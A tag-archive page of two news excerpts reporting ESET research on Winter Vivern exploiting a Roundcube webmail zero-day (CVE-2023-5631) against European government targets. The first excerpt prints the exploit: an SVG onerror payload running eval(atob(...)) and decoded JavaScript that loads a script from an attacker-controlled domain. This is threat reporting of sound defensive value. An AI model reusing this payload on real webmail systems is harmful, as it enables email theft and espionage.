Tag Archive for: webmail

New Cyberattack From Winter Vivern Exploits a Zero-Day Vulnerability in Roundcube Webmail

/in


After reading the technical details about this zero-day that targeted governmental entities and a think tank in Europe and learning about the Winter Vivern threat actor, get tips on mitigating this cybersecurity attack.

ESET researcher Matthieu Faou has exposed a new cyberattack from a cyberespionage threat actor known as Winter Vivern, whose interests align with Russia and Belarus. The attack focused on exploiting a zero-day vulnerability in Roundcube webmail, with the result being the ability to list folders and emails in Roundcube accounts and exfiltrate full emails to an attacker-controlled server. The cybersecurity company ESET noted the campaign has targeted governmental entities and a think tank in Europe. This cyberattack is no longer active.

Jump to:

Technical details about this cyberattack exploiting a 0day in Roundcube

The threat actor starts the attack by sending a specially crafted email message with the subject line “Get started in your Outlook” and coming from “team.management@outlook(.)com” (Figure A).

Figure A

figure A ESET Roundcube.
Malicious email message sent by Winter Vivern to its targets. Image: ESET

At the end of the email, a SVG tag contains a base64-encoded malicious payload; this is hidden for the user but present in the HTML source code. Once decoded, the malicious content is:

<svg id="http://www.bing.com/news/x" xmlns="http://www.w3.org/2000/svg"> <image href="http://www.bing.com/news/x" onerror="eval(atob('<base64-encoded payload>'))" /></svg>

The goal of the malicious code is to trigger the onerror attribute by using an invalid URL in the x parameter.

Decoding the payload in the onerror attribute results in a line of JavaScript code that will be executed in the victim’s browser in the context of the user’s Roundcube session:

var fe=document.createElement('script');
fe.src="https://recsecas[.]com/controlserver/checkupdate.js";
document.body.appendChild(fe);

The JavaScript injection worked on fully patched Roundcube instances at the time of Faou’s discovery. The researcher could establish that this zero-day vulnerability was located in the server-side script rcube_washtml.php, which failed to ” … properly sanitize the malicious SVG…

Source…

Winter Vivern APT Blasts Webmail Zero-Day Bug With One-Click Exploit

/in


Low-profile threat group Winter Vivern has been exploiting a zero-day flaw in Roundcube Webmail servers with a malicious email campaign targeting governmental organizations and a think tank in Europe that requires only that a user view a message.

Earlier this month, researchers at ESET Research observed the group sending a specially crafted email message that loads an arbitrary JavaScript code in the context of the Roundcube user’s browser window to exploit a newly discovered cross-site scripting (XSS) flaw tracked as CVE-2023-5631. The one-click exploit requires no manual interaction on the part of the user other than viewing the message in a Web browser, the researchers reported in a blog post published Oct. 25.

Roundcube is a freely available, open source webmail solution that’s especially popular with small-to-midsize organizations. The flaw affects versions before 1.4.15, 1.5.x before 1.5.5, and 1.6.x before 1.6.4, and allows for stored XSS via an HTML email message with a crafted SVG document due to the behavior of “program/lib/Roundcube/rcube_washtml.php,” according to its CVE listing. This, in turn, allows a remote attacker to load arbitrary JavaScript code.

ESET Research reported the vulnerability to the Roundcube team on Oct. 12 and received a response and patch from the company two days later on Oct. 14. On Oct. 16, Roundcube released security updates with new versions 1.6.4, 1.5.5, and 1.4.15 to address the flaw.

Long-Term Targeting

Winter Vivern’s activity is often underreported by security researchers but the group has been active since at least December 2020 and shows sympathies with Russia and Belarus, conducting cyber espionage that serves the interest of those nations. The group typically uses malicious documents, phishing websites, and a custom PowerShell backdoor to compromise its targets and may be linked to a sophisticated Belarus-aligned group MoustachedBouncer.

The latest activity observed by ESET— which has been tracking Winter Vivern closely for about a year is consistent with the group’s typical methods, though previously they exploited flaws that already were public, notes ESET Researcher Mathieu Faou.

“Since at least 2022, they have been exploiting XSS…

Source…